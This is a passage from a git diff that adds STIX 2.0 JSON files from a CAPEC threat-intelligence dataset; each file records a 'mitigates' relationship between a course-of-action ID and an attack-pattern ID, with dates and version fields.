"2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json new file mode 100644 index 0000000000000000000000000000000000000000..a57fc1c648c6847bcca118d6f3719047b70f4b93 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b8f1cc81-6bbc-4d9c-a09a-b7b8f591854a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be.json new file mode 100644 index 0000000000000000000000000000000000000000..d2ca8c5c490e1584e6b6a10080ca29e3c16e67f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a7905198-67d6-4510-9885-2774c7a2a62e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2.json new file mode 100644 index 0000000000000000000000000000000000000000..cf9790e2e845cfb7731411db4f62a7f9bd7a8ef0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ae68c964-19db-4467-a201-4e7d3f64f1f9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "target_ref": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda.json new file mode 100644 index 0000000000000000000000000000000000000000..978d8022316fa580f6d3c5e51cc5bcd6534a6d98 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c9804303-7abd-4aa5-89e2-06560e7bf623", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a94e0345-2aae-474c-96d1-4ee3ce4403b5", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7.json new file mode 100644 index 0000000000000000000000000000000000000000..38c7c3e9ef4c3bbc021ebf97e0556be422a6db03 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7615989a-0492-4729-8901-f366b3ee3c21", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json new file mode 100644 index 0000000000000000000000000000000000000000..7520b34e47d3d3c6ce4bf09862dbe12697c68b1d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--220bd1c8-1926-4def-8e58-1d16ea07eeba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f6100503-6f80-4635-b9dd-c9d1788158b5.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f6100503-6f80-4635-b9dd-c9d1788158b5.json new file mode 100644 index 0000000000000000000000000000000000000000..f49d21981933d401b2cf81204715938550f56251 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f6100503-6f80-4635-b9dd-c9d1788158b5.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4a83986b-10d0-4592-8bab-c68e74304b49", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6100503-6f80-4635-b9dd-c9d1788158b5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb.json new file mode 100644 index 0000000000000000000000000000000000000000..f1d0d0f02b7c48e5a55ac58d5c29e2849da28e2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--69dd8c59-3f74-4f73-a87e-517d1eb9fda9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--caf1260a-2cbc-467a-aa8a-f66f1d2107c9", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fa411755-d981-4b14-9dbc-aed949041db7.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fa411755-d981-4b14-9dbc-aed949041db7.json new file mode 100644 index 0000000000000000000000000000000000000000..e5884f548012289fff23404bd21cca4195785ab7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fa411755-d981-4b14-9dbc-aed949041db7.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e305c5f2-898a-453f-b0ba-9173be5b72bf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa411755-d981-4b14-9dbc-aed949041db7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "target_ref": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb.json new file mode 100644 index 0000000000000000000000000000000000000000..ea87082df8de29135ae0cb79255444ebd1e24103 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--34296764-6c59-488d-8576-162b8830d831", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fcdf171c-f44d-4397-8365-c74fb76197ea.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fcdf171c-f44d-4397-8365-c74fb76197ea.json new file mode 100644 index 0000000000000000000000000000000000000000..03291a9ba27f4869a60f54d6f9d0c4d7feb4806d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fcdf171c-f44d-4397-8365-c74fb76197ea.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--886b0c7e-5f09-4158-8dfa-65be443ea0a1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcdf171c-f44d-4397-8365-c74fb76197ea", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd286fbd-f1da-41de-9516-8d195eb182a9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd286fbd-f1da-41de-9516-8d195eb182a9.json new file mode 100644 index 0000000000000000000000000000000000000000..801e29e5b1920a1bb5a1fa075f2b5e580fe5cf41 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd286fbd-f1da-41de-9516-8d195eb182a9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3607c98b-9cd9-4889-8766-d402f7e415bb", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd286fbd-f1da-41de-9516-8d195eb182a9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd548983-e701-4e46-9b7c-cfc9318fd925.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd548983-e701-4e46-9b7c-cfc9318fd925.json new file mode 100644 index 0000000000000000000000000000000000000000..93a75b16835ec68cc4ae0edc9d51ee77559e164c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd548983-e701-4e46-9b7c-cfc9318fd925.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ef813ef3-15b4-455d-add3-bdf2b47f9c67", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd548983-e701-4e46-9b7c-cfc9318fd925", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b.json new file mode 100644 index 0000000000000000000000000000000000000000..865feabe601106b37de394a17e76177b051fe5d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--68163871-7261-4878-9708-9dc27d23ed0f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json new file mode 100644 index 0000000000000000000000000000000000000000..2d0e1ff09090baa4dca341d74c6520372cca63be --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--117d9d7a-62ee-4e9a-8ee7-04764e2bdca8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json new file mode 100644 index 0000000000000000000000000000000000000000..9516a5218a3df1d08a55948a12ca86b44380d5cc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--94bce9ce-1641-4db4-b389-c383c41676e0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json new file mode 100644 index 0000000000000000000000000000000000000000..8ba7396694223e0607ed75cb4b4cc173cedab0ce --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9bbda65e-6b1c-4c94-a946-258e98912965", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json new file mode 100644 index 0000000000000000000000000000000000000000..1abd7065f40160beeed16c81b3fa7141457ee33c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5a1e81e4-565b-40bd-9e14-57a0e39d0157", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ede338-8195-4a10-aefe-e52224f13800", + "target_ref": "attack-pattern--dbe3513a-5527-4aaf-a463-ead5eae2967f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json new file mode 100644 index 0000000000000000000000000000000000000000..686445fb81c869e9f0bd3b64aa552bb35ddcec7e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a1851ccf-e1ef-40af-af1d-b61b0fc3a3c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe330f06-2741-49df-9e82-3eea2c36031c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe59f444-2244-4606-8c27-be7408eace85.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe59f444-2244-4606-8c27-be7408eace85.json new file mode 100644 index 0000000000000000000000000000000000000000..0f025870d6f1ee6e74f2d30dd9dfb9bffcf1a32a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe59f444-2244-4606-8c27-be7408eace85.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8394f0c4-9736-4cfe-9955-244795103881", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe59f444-2244-4606-8c27-be7408eace85", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef2f0f49-2527-4176-8440-e40e618ad631", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json new file mode 100644 index 0000000000000000000000000000000000000000..2fe8d1af07e9fd2904a00ca0f0901b72b098299c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e5622a8e-eb97-4cb9-badc-0a599ee72404", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json new file mode 100644 index 0000000000000000000000000000000000000000..a99cce35bada108534bf8d40eb20888ddaa7b27a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--47b7a47d-3171-4b26-a965-324adb4f192a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json new file mode 100644 index 0000000000000000000000000000000000000000..95926c20998d41a342b8873aedc2caa39c74f910 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7ab14b53-22a9-4c9c-8acf-447f1726de72", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": 